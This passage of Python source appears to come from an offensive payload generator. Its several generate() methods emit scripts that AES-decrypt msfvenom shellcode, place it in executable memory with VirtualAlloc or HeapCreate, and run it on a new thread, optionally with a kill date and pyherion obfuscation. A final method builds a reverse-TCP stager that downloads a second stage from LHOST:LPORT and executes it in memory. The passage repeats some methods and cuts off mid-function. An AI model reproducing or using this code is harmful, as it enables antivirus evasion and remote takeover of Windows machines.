            TODO confirm encryptAES never returns a quote or backslash in the key.
          * AES.new() receives only the key, so the library's default mode applies
            (ECB in PyCrypto) - confirm against the encryption module.
          * The emitted code relies on str.decode("string_escape"), i.e. Python 2.
          * Several randomised names (RandShellCode, RandPtr, RandBuf, RandHt,
            RandToday, RandExpire, ShellcodeVariableName, RandReverseShell) are
            generated but unused in some branches; harmless noise.
        """
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names (ShellcodeVariableName is unused here)
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                # decrypt helper: base64 -> AES -> strip '{' padding
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                # key and ciphertext both land in the payload (see docstring)
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                # -1 = INFINITE: block until the shellcode thread exits
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date.
                # str(date) is 'YYYY-MM-DD'; [2:] below drops the century to match
                # the '%y-%m-%d' format used by the emitted strptime.
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # kill-date check: local wall clock vs. hard-coded date (bypassable);
                # everything below is indented under it with a tab
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t' + RandShellCode + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + RandShellCode + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + RandShellCode + ')).from_buffer(' + RandShellCode + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        if self.required_options["inject_method"][0].lower() == "heap":
            if self.required_options["expire_payload"][0].lower() == "x":


                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names (RandShellCode, RandToday and
                # RandExpire are unused in this branch)
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE; heap sized to twice the
                # shellcode length.  0x00000008 = HEAP_ZERO_MEMORY.
                PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                # (see the 'virtual' branch for the [2:] / '%y-%m-%d' pairing)
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names (RandShellCode unused here)
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()
                HeapVar = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'import ctypes\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # kill-date check: local wall clock vs. hard-coded date (bypassable)
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = bytearray(' + RandDecodedShellcode + '.decode("string_escape"))\n'
                # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE, 0x00000008 = HEAP_ZERO_MEMORY
                PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
                PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
                PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            # Fallback for any inject_method other than "virtual"/"heap": run the
            # shellcode by casting a ctypes string buffer to a function pointer.
            # No explicit RWX allocation is made here; whether the buffer is
            # executable depends on the interpreter/OS (DEP) - not verifiable
            # from this file.
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names (RandPtr, RandBuf, RandHt,
                # RandShellCode and RandReverseShell are unused in this branch)
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += RandPadding + ' = \'{\'\n'
                PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                # decoded as a plain str here (no bytearray), then cast and called
                PayloadCode += ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += RandShellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                # (see the 'virtual' branch for the [2:] / '%y-%m-%d' pairing)
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names (RandPtr, RandBuf, RandHt,
                # RandShellCode and RandReverseShell are unused in this branch)
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = 'from ctypes import *\n'
                PayloadCode += 'from Crypto.Cipher import AES\n'
                PayloadCode += 'import base64\n'
                PayloadCode += 'import os\n'
                PayloadCode += 'from datetime import datetime\n'
                PayloadCode += 'from datetime import date\n\n'
                # kill-date check: local wall clock vs. hard-coded date (bypassable)
                PayloadCode += RandToday + ' = datetime.now()\n'
                PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
                PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
                PayloadCode += '\t' + RandPadding + ' = \'{\'\n'
                PayloadCode += '\t' + RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
                PayloadCode += '\t' + RandCipherObject + ' = AES.new(\'' + secret + '\')\n'
                PayloadCode += '\t' + RandDecodedShellcode + ' = ' + RandDecodeAES + '(' + RandCipherObject + ', \'' + EncodedShellcode + '\')\n'
                PayloadCode += '\t' + ShellcodeVariableName + ' = ' + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                PayloadCode += '\t' + RandShellcode + '()'

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
    def generate(self):
        if self.required_options["inject_method"][0].lower() == "virtual":
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = "import ctypes\n"
                PayloadCode += "from Crypto.Cipher import AES\n"
                PayloadCode += "import base64\n"
                PayloadCode += "import os\n"
                PayloadCode += RandPadding + " = '{'\n"
                PayloadCode += (
                    RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
                )
                PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
                PayloadCode += (
                    RandDecodedShellcode
                    + " = "
                    + RandDecodeAES
                    + "("
                    + RandCipherObject
                    + ", '"
                    + EncodedShellcode
                    + "')\n"
                )
                PayloadCode += RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
                PayloadCode += (
                    RandPtr
                    + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                    + RandShellCode
                    + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
                )
                PayloadCode += (
                    RandBuf + " = (ctypes.c_char * len(" + RandShellCode + ")).from_buffer(" + RandShellCode + ")\n"
                )
                PayloadCode += (
                    "ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",ctypes.c_int(len("
                    + RandShellCode
                    + ")))\n"
                )
                PayloadCode += (
                    RandHt
                    + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                    + RandPtr
                    + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
                )
                PayloadCode += (
                    "ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
                )

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:

                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = "import ctypes\n"
                PayloadCode += "from Crypto.Cipher import AES\n"
                PayloadCode += "import base64\n"
                PayloadCode += "import os\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandPadding + " = '{'\n"
                PayloadCode += (
                    "\t"
                    + RandDecodeAES
                    + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip("
                    + RandPadding
                    + ")\n"
                )
                PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n"
                PayloadCode += (
                    "\t"
                    + RandDecodedShellcode
                    + " = "
                    + RandDecodeAES
                    + "("
                    + RandCipherObject
                    + ", '"
                    + EncodedShellcode
                    + "')\n"
                )
                PayloadCode += (
                    "\t" + RandShellCode + " = bytearray(" + RandDecodedShellcode + '.decode("string_escape"))\n'
                )
                PayloadCode += (
                    "\t"
                    + RandPtr
                    + " = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len("
                    + RandShellCode
                    + ")),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandBuf
                    + " = (ctypes.c_char * len("
                    + RandShellCode
                    + ")).from_buffer("
                    + RandShellCode
                    + ")\n"
                )
                PayloadCode += (
                    "\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int("
                    + RandPtr
                    + "),"
                    + RandBuf
                    + ",ctypes.c_int(len("
                    + RandShellCode
                    + ")))\n"
                )
                PayloadCode += (
                    "\t"
                    + RandHt
                    + " = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int("
                    + RandPtr
                    + "),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n"
                )
                PayloadCode += (
                    "\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(" + RandHt + "),ctypes.c_int(-1))\n"
                )

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

        else:
            if self.required_options["expire_payload"][0].lower() == "x":

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = "from ctypes import *\n"
                PayloadCode += "from Crypto.Cipher import AES\n"
                PayloadCode += "import base64\n"
                PayloadCode += "import os\n"
                PayloadCode += RandPadding + " = '{'\n"
                PayloadCode += (
                    RandDecodeAES + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(" + RandPadding + ")\n"
                )
                PayloadCode += RandCipherObject + " = AES.new('" + secret + "')\n"
                PayloadCode += (
                    RandDecodedShellcode
                    + " = "
                    + RandDecodeAES
                    + "("
                    + RandCipherObject
                    + ", '"
                    + EncodedShellcode
                    + "')\n"
                )
                PayloadCode += ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n'
                PayloadCode += (
                    RandMemoryShell
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                )
                PayloadCode += RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode

            else:
                # Get our current date and add number of days to the date
                todaysdate = date.today()
                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))

                # Generate Shellcode Using msfvenom
                Shellcode = self.shellcode.generate()

                # Generate Random Variable Names
                ShellcodeVariableName = helpers.randomString()
                RandPtr = helpers.randomString()
                RandBuf = helpers.randomString()
                RandHt = helpers.randomString()
                RandDecodeAES = helpers.randomString()
                RandCipherObject = helpers.randomString()
                RandDecodedShellcode = helpers.randomString()
                RandShellCode = helpers.randomString()
                RandPadding = helpers.randomString()
                RandShellcode = helpers.randomString()
                RandReverseShell = helpers.randomString()
                RandMemoryShell = helpers.randomString()
                RandToday = helpers.randomString()
                RandExpire = helpers.randomString()

                # encrypt the shellcode and grab the randomized key
                (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)

                # Create Payload code
                PayloadCode = "from ctypes import *\n"
                PayloadCode += "from Crypto.Cipher import AES\n"
                PayloadCode += "import base64\n"
                PayloadCode += "import os\n"
                PayloadCode += "from datetime import datetime\n"
                PayloadCode += "from datetime import date\n\n"
                PayloadCode += RandToday + " = datetime.now()\n"
                PayloadCode += RandExpire + ' = datetime.strptime("' + expiredate[2:] + '","%y-%m-%d") \n'
                PayloadCode += "if " + RandToday + " < " + RandExpire + ":\n"
                PayloadCode += "\t" + RandPadding + " = '{'\n"
                PayloadCode += (
                    "\t"
                    + RandDecodeAES
                    + " = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip("
                    + RandPadding
                    + ")\n"
                )
                PayloadCode += "\t" + RandCipherObject + " = AES.new('" + secret + "')\n"
                PayloadCode += (
                    "\t"
                    + RandDecodedShellcode
                    + " = "
                    + RandDecodeAES
                    + "("
                    + RandCipherObject
                    + ", '"
                    + EncodedShellcode
                    + "')\n"
                )
                PayloadCode += (
                    "\t" + ShellcodeVariableName + " = " + RandDecodedShellcode + '.decode("string_escape")\n'
                )
                PayloadCode += (
                    "\t"
                    + RandMemoryShell
                    + " = create_string_buffer("
                    + ShellcodeVariableName
                    + ", len("
                    + ShellcodeVariableName
                    + "))\n"
                )
                PayloadCode += "\t" + RandShellcode + " = cast(" + RandMemoryShell + ", CFUNCTYPE(c_void_p))\n"
                PayloadCode += "\t" + RandShellcode + "()"

                if self.required_options["use_pyherion"][0].lower() == "y":
                    PayloadCode = encryption.pyherion(PayloadCode)

                return PayloadCode
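    def generate(self):
        """Return the Python 2 source of a reverse-TCP stager that runs a DLL in memory.

        The emitted script:

        1. connects a TCP socket to ``LHOST``:``LPORT`` (both copied verbatim
           from ``self.required_options``),
        2. reads a 4-byte little-endian length and keeps calling ``recv`` until
           the buffer reaches that length,
        3. overwrites the first five bytes of the buffer with ``0xBF`` followed
           by the packed socket descriptor (``mov edi, <fd>``) so the stage can
           reuse the already-open connection,
        4. copies the buffer into ``VirtualAlloc``'d RWX memory, ``VirtualLock``s
           it and runs it on a new thread.

        ``expire_payload`` is ``x`` ("never") or a number of days; in the latter
        case the download/inject calls sit under a date check.  ``use_pyherion``
        == ``y`` passes the finished source through ``encryption.pyherion``.

        Returns:
            str: the generated script.

        Raises:
            ValueError: if ``expire_payload`` is neither ``x`` nor an int.

        Security note: the stage travels in cleartext and is executed without
        any authenticity check, so whoever answers on LHOST:LPORT decides what
        runs.  That is inherent to this stager design, not fixable here.
        """
        self._validateArchitecture()

        lhost = self.required_options["LHOST"][0]
        lport = self.required_options["LPORT"][0]
        expire_payload = self.required_options["expire_payload"][0]

        # randomize all of the variable names used in the generated script
        shellCodeName = helpers.randomString()
        socketName = helpers.randomString()
        getDataMethodName = helpers.randomString()
        fdBufName = helpers.randomString()
        rcvStringName = helpers.randomString()
        rcvCStringName = helpers.randomString()

        injectMethodName = helpers.randomString()
        tempShellcodeName = helpers.randomString()
        shellcodeBufName = helpers.randomString()
        fpName = helpers.randomString()
        tempCBuffer = helpers.randomString()

        # NOTE(review): random and time are imported by the template but never
        # used by it; kept so the emitted source stays byte-identical.
        payloadCode = "import struct, socket, binascii, ctypes, random, time\n"

        # socket and shellcode variables that need to be kept global
        payloadCode += "%s, %s = None, None\n" % (shellCodeName, socketName)

        # --- downloader: connect to the handler, fetch and patch the stage ---
        payloadCode += "def %s():\n" % (getDataMethodName)
        payloadCode += "\ttry:\n"
        payloadCode += "\t\tglobal %s\n" % (socketName)
        payloadCode += "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % (socketName)
        # LHOST lands inside a single-quoted literal and LPORT bare; neither is
        # escaped, both come straight from the operator's options.
        payloadCode += "\t\t%s.connect(('%s', %s))\n" % (socketName, lhost, lport)
        # pack the underlying socket file descriptor as a 4-byte little-endian int
        payloadCode += "\t\t%s = struct.pack('<i', %s.fileno())\n" % (fdBufName, socketName)
        # the handler announces the stage length as a 4-byte little-endian int
        payloadCode += "\t\tl = struct.unpack('<i', str(%s.recv(4)))[0]\n" % (socketName)
        # five placeholder bytes, overwritten with the mov-edi prefix further down
        payloadCode += "\t\t%s = \"     \"\n" % (rcvStringName)
        # receive until the buffer (placeholder included) reaches the announced
        # length.  NOTE(review): the 5 placeholder bytes count toward `l`, so a
        # short recv can leave the last few stage bytes unread - inherited quirk.
        payloadCode += "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % (rcvStringName, rcvStringName, socketName)
        payloadCode += "\t\t%s = ctypes.create_string_buffer(%s, len(%s))\n" % (rcvCStringName, rcvStringName, rcvStringName)
        # 0xBF is `mov edi, imm32`; the following four bytes are the socket fd
        payloadCode += "\t\t%s[0] = binascii.unhexlify('BF')\n" % (rcvCStringName)
        payloadCode += "\t\tfor i in xrange(4): %s[i+1] = %s[i]\n" % (rcvCStringName, fdBufName)
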